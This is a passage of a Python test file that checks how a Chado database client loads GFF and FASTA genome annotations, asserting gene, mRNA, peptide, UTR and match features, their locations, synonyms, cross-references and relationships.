peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "fooPAC:18136219-bar", "gff>pep loaded correctly"
def test_load_gff_twice(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
# Adding twice the same gff should not change anything in the db
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 30, "mRNA relationships, single peptide" # relations to utr/cds/exons are duplicarted as they don't have an ID or Name attribute in gff => random uniquename in db
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_landmarktype(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
# there's a contig loaded by fasta and a supercontig in gff
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_nolandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Should create the landmark
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig", no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
@raises(Exception)
def test_load_gff_nolandmark_fail(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Should create the landmark
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_match(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
an_match = self._create_fake_an('matches')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/matches.gff", analysis_id=an_match['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
# Check match
match_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein_XP_012228303.1_match_0001") \
.one()
matchterm = self.ci.get_cvterm_id('match', 'sequence')
matchpartterm = self.ci.get_cvterm_id('match_part', 'sequence')
assert match_f.dbxref_id is None, "gff>match loaded correctly"
assert match_f.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_f.name == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.residues is None, "gff>match loaded correctly"
assert match_f.seqlen is None, "gff>match loaded correctly"
assert match_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_f.type_id == matchterm, "gff>match loaded correctly"
assert match_f.is_analysis is False, "gff>match loaded correctly"
assert match_f.is_obsolete is False, "gff>match loaded correctly"
assert len(match_f.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].phase == 0, "gff>match loaded correctly"
# Check relationships
assert len(match_f.object_in_relationships) == 1, "match_part relationship"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert match_f.object_in_relationships[0].type_id == partofterm, "match_part relationship"
# Check gene featureprop
expected = [
'e-value___1e-27___0',
'hit_description___PREDICTED: uncharacterized protein LOC105675603 [Linepithema humile]___0',
'hit_name___XP_012228303.1___0'
]
assert len(match_f.featureprop_collection) == 3, "gff>match loaded correctly"
for prop in match_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
match_part = match_f.object_in_relationships[0].subject
assert match_part.dbxref_id is None, "gff>match loaded correctly"
assert match_part.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_part.name == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.residues is None, "gff>match loaded correctly"
assert match_part.seqlen is None, "gff>match loaded correctly"
assert match_part.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_part.type_id == matchpartterm, "match_part"
assert match_part.is_analysis is False, "gff>match loaded correctly"
assert match_part.is_obsolete is False, "gff>match loaded correctly"
assert len(match_part.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].phase == 1, "gff>match loaded correctly"
# Check gene featureprop
expected = [
'target___XP_012228303.1+21+302___0'
]
assert len(match_part.featureprop_collection) == 1, "gff>match loaded correctly"
for prop in match_part.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check analysisfeature
assert match_f.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_f.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
def test_load_gff_withpepfasta(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/prots.fa")
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues == "SGTRGVDFSVFDC", "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 13, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "744bbb7c3f619a479ea90b4e9f627bd1", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkfasta(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues.startswith("TTTTGTATTCTATGTCCTCTGATCTTT"), "gff>fasta seq loaded correctly"
assert lm_f.seqlen == 5927163, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "80db0e5ccdc07e200c035d23c5951271", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues.startswith("AAAGGAATTGAGTTTCATTAAGAATTTAAATAAAACAATGTCATAATCCGGGTATTTGGAATATT"), "gff>fasta seq loaded correctly"
assert mrna_f.seqlen == 1212, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "ad0d8a5031b63bacfe23296c80072550", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues.startswith("KGIEFH*EFK*NNVIIRVFGIFKLQPGLVVMQRPTR*QNDNLALVLGFRSFVHSFSS*AKANWNLTKCNAYTSSEPEQHSSYKXXXXXXXXXXXXXXXXXXXXXX"), "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 404, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "fbf522da5203405c620eb708afd3cc9f", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig, and other features will be mapped on it.
# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
@raises(Exception)
def test_load_gff_withoutlandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig, and the loader features will try to map on a contig => fail
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'])
def test_load_gff_withwronglandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig and a contig, and other features will be mapped on contig.
